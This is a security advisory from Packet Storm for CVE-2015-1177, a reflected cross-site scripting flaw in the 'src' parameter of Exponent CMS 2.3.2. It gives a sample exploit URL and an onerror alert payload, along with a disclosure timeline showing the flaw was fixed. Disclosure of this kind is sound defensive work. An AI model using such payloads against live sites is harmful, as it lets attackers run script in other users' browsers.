Exponent CMS 2.3.2 Cross Site Scripting

2015-01-22T00:00:00
ID PACKETSTORM:130058
Type packetstorm
Reporter Sudhanshu Chauhan
Modified 2015-01-22T00:00:00

Description

                                        
                                            `CVE-2015-1177-xss-exponent  
  
  
Information  
----------------  
Advisory by Octogence.  
Name: Reflected XSS Vulnerability in Exponent CMS  
Affected Software : Exponent  
Affected Versions: 2.3.2 and possibly below  
Vendor Homepage : http://www.exponentcms.org/  
Vulnerability Type : Cross-site Scripting  
Severity : High  
CVE ID: CVE-2015-1177  
  
Impact  
----------  
An attacker can craft a URL with malicious JavaScript code which  
executes in the browser.  
  
Technical Details  
-------------------------  
Sample URL:  
http://localhost/exponent/index.php?controller=search&src=f324e”><img%20src%3da%20onerror%3dalert(1)>9cbae6bf552&action=search&search_string=test&int=%0d  
  
Parameter:  
src  
  
Sample Payload:  
“><img src=a onerror=alert(1)>  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
Advisory Timeline (mm/dd/yyyy)  
----------------------------------------------  
12/29/2014 – Reported  
12/30/2014 – Vulnerability Fixed  
01/22/2015 – Advisory Released  
  
  
--   
Regards  
Sudhanshu  
  
Octogence Tech Solutions  
Noida, India  
Mobile | +91-9971658929  
Website| www.octogence.com  
`